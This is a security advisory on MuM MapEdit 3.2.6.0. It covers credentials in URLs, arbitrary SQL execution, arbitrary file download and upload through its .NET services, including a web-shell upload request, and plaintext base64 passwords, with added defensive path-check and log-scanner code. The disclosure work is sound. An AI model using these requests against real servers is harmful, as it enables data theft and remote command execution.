# Security Advisory -- Multiple Vulnerabilities - MuM MapEdit

## Product

Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
Product: MapEdit
Affected software version: 3.2.6.0

MuM MapEdit provides geodata to the internet and to intranets and is deployed on several communal and regional governmental infrastructures to provide geodata to the population. It consists of a Silverlight client and a C#.NET backend. The communication between them is HTTP/S based and uses NBFS (.NET Binary Format SOAP).

Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD

## Status/Metrics/Identifier

CVE-ID: tbd
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS Score: 9.0

The CVSS score reflects the possibility for an attacker to upload web shells and execute them with the privileges of the web server user.

## Author/Credits

Paul Baade (TUV Rheinland i-sec GmbH)
Sven Krewitt (TUV Rheinland i-sec GmbH)

## Fixed Versions

According to MuM, all described vulnerabilities are fixed in version 6.2.74; some of them are reportedly already fixed in version 5.1.

## Authentication via GET Parameter

The application requires users to provide their credentials via GET parameters. They can therefore end up in server logs or proxy logs. An example URL would be:

```
/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]
```

## Execution of arbitrary SQL commands on contained SQLite DBs

The application contains several SQLite databases. An authenticated user may send POST requests to the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries on the databases.
The content of the POST request is encoded in Microsoft's NBFS (.NET Binary Format SOAP) and can be decoded to the following XML data:

Request:

```
urn:DataAccessService/QueryData
urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3
http://www.w3.org/2005/08/addressing/anonymous
http://[host]/Mum.Geo.Services/DataAccessService.svc
0 999 0 SYSTEM Unknown
[path_to_MumGeoData]\System\System.db
select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption
0 1 2000 0
```

The node "Filename" can be used to access different SQLite databases on the system, while the node "sql" contains the SQL query to be executed. Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:

Response:

```
urn:DataAccessService/QueryDataResponse
urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3
eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj
true
NAME DbString false false 255 NAME 0 0
CAPTION DbString false false 255 CAPTION 0 0
VERSION_SYSTEMDATA DbString true false 40 VERSION_SYSTEMDATA 0 0
true
```

The nodes "DbColumnDefinition" contain the definition of the returned columns; the node "Data" contains the result of the SQL query as Base64-encoded, zlib-compressed data:

```
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
```

The same result is produced when the database is read locally:

```
>sqlite3 System.db
sqlite> select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption;
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
```

## Arbitrary file manipulation

By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to perform several actions. The most interesting, from an attacker's point of view, are the following:

- "GetFileNames", which lists the files in a given folder
- "DownloadFile", which lets the user download any file the web server has read access to
- "UploadFile", which allows uploading files to folders the web server has write access to

The different activities are documented in the subsections below. As in the SQL execution section, the request and response content has been decoded from NBFS for better readability.

### File exploration

An authenticated user is able to list all files in a given folder by sending the following content to the IO service.

Request:

```
urn:IO/GetFileNames
urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676
http://www.w3.org/2005/08/addressing/anonymous
http://[host]/Mum.Geo.Services/IO.svc
[path_to_webroot]
*.*
false
```

Response:

```
urn:IO/GetFileNamesResponse
urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676
clientaccesspolicy.xml
crossdomain.xml
iisstart.htm
index.html
index.php
Thumbs.db
web.config
welcome.png
[path_to_webroot]
true
```

### Download of arbitrary files

The same web service can be abused to download any file that the web server user has read access to.
Request:

```
urn:IO/DownloadFile
urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504
http://www.w3.org/2005/08/addressing/anonymous
http://[host]/Mum.Geo.Services/IO.svc
[path_to_webroot]\Mum.Geo.Services\Admin.html
```

Response:

```
urn:IO/DownloadFileResponse
urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504
77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=
false
true
```

The node "Data" itself can be base64-decoded to obtain the file contents; the visible text of the downloaded Admin.html is:

```
Admin

Start Mum Administrator
```

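The IO service accepts whatever path the client supplies for GetFileNames, DownloadFile and UploadFile, which is what turns an authenticated user into a web-shell uploader. The check below is an added example, not MapEdit's code: it confines requested paths to a data directory (DATA_ROOT and the sample paths are constructed) and refuses uploads with extensions ASP.NET would execute.

```python
import ntpath

# Constructed example root; the real [path_to_MumGeoData] is site-specific.
DATA_ROOT = r"C:\inetpub\MumGeoData\Userdata"

# Extensions ASP.NET executes or IIS honours as configuration: an upload of
# any of these into a served folder is a web shell or a config override.
EXECUTABLE_EXT = {".aspx", ".ashx", ".asmx", ".asax", ".config", ".dll", ".exe"}


def contained_path(requested, root=DATA_ROOT):
    """Return the normalised path if it lies inside root, otherwise None.

    ntpath applies Windows semantics (backslashes, drive letters, case
    insensitivity) no matter which platform runs the check.
    """
    norm_root = ntpath.normcase(ntpath.normpath(root))
    # Relative requests are interpreted under root; an absolute request such
    # as <webroot>\Mum.Geo.Services\Admin.html replaces root in the join.
    candidate = ntpath.normpath(ntpath.join(root, requested))
    try:
        # normpath has collapsed any "..", so a traversal that escapes root no
        # longer shares root as its common prefix (component-wise, not string).
        common = ntpath.commonpath([norm_root, ntpath.normcase(candidate)])
    except ValueError:
        # Raised for a different drive letter or a UNC path: outside root.
        return None
    return candidate if common == norm_root else None


def upload_allowed(requested, root=DATA_ROOT):
    """Uploads must stay under root and must not be server-executable."""
    target = contained_path(requested, root)
    if target is None:
        return False
    return ntpath.splitext(target)[1].lower() not in EXECUTABLE_EXT
```

A string prefix comparison would accept a sibling such as UserdataX; the component-wise commonpath check does not.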
### Upload of arbitrary files

The web service can be abused to upload a file to any folder that the web server user has write access to.

Request:

```
urn:IO/UploadFile
urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a
http://www.w3.org/2005/08/addressing/anonymous
http://[host]/Mum.Geo.Services/IO.svc
[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx
[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626
false
true
```

The "data" node contains a base64-encoded, zlib-packed ASPX web shell. It can be used to issue arbitrary commands on the compromised host.

Response:

```
urn:IO/UploadFileResponse
urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a
true
```

## Base64 encoded Passwords

In the database file \MumGeoData\System\System.db, passwords are stored in the tables "user" and "connection". Both tables store their passwords in plain text with base64 encoding applied. Example:

```
sqlite> select * from user where name='MUM';
|MUM||1||
```

## Remark about information disclosures

By observing the communication between a MapEdit Silverlight client and its backend server, various pieces of information could be gathered, particularly file paths and license keys. Additionally, the error messages the server generates disclose quite a lot of information about the backend parsing process.

## History

- 2016-06-07 Discovery of the mentioned vulnerabilities
- 2016-06-09 First contact with MuM
- 2016-06-23 Confirmation of the mentioned vulnerabilities
- 2016-07-29 Release of version 6.2.74
- 2016-09-13 Public disclosure
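For operators who ran the affected version, the two traces this advisory leaves in web server logs are credentials in Start.aspx query strings and POSTs to the two service endpoints. The scanner below is an added example, not from the advisory or the vendor; it parses a constructed IIS W3C log excerpt (SAMPLE_LOG) and redacts the credentials it reports.

```python
import re
from urllib.parse import parse_qsl

# Endpoints named in the advisory; POSTs to them carry NBFS-encoded SQL or
# file operations whose content the web server log cannot show.
MAPEDIT_SERVICES = ("/mum.geo.services/dataaccessservice.svc",
                    "/mum.geo.services/io.svc")
CRED_KEYS = {"username", "password"}

# Constructed IIS W3C log excerpt, not taken from a real server.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-06-07 10:15:01 10.0.0.5 GET /Mum.Geo.Services/Start.aspx AutoUrl=1&Username=TEST&Password=TEST 80 - 192.0.2.10 Mozilla/5.0 200
2016-06-07 10:15:03 10.0.0.5 POST /Mum.Geo.Services/DataAccessService.svc - 80 - 192.0.2.10 Mozilla/5.0 200
2016-06-07 10:15:09 10.0.0.5 POST /Mum.Geo.Services/IO.svc - 80 - 192.0.2.10 Mozilla/5.0 200
2016-06-07 10:16:00 10.0.0.5 GET /index.html - 80 - 192.0.2.11 Mozilla/5.0 200
"""


def redact_query(query):
    """Replace credential values so the finding itself does not leak them."""
    return re.sub(r"(?i)(username|password)=[^&]*", r"\1=[REDACTED]", query)


def scan_iis_log(text):
    """Return one finding dict per suspicious line, mapping columns via #Fields."""
    fields, findings = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "-")
        if query != "-":
            keys = {k.lower() for k, _ in parse_qsl(query, keep_blank_values=True)}
            if keys & CRED_KEYS:
                findings.append({"client": rec.get("c-ip"), "kind": "credentials_in_url",
                                 "detail": f"{stem}?{redact_query(query)}"})
        if stem in MAPEDIT_SERVICES and rec.get("cs-method") == "POST":
            findings.append({"client": rec.get("c-ip"), "kind": "mapedit_service_call",
                             "detail": stem})
    return findings
```

POSTs to the two services are also normal client traffic, so the second finding type is for correlation by source, volume and timing rather than an alert on its own.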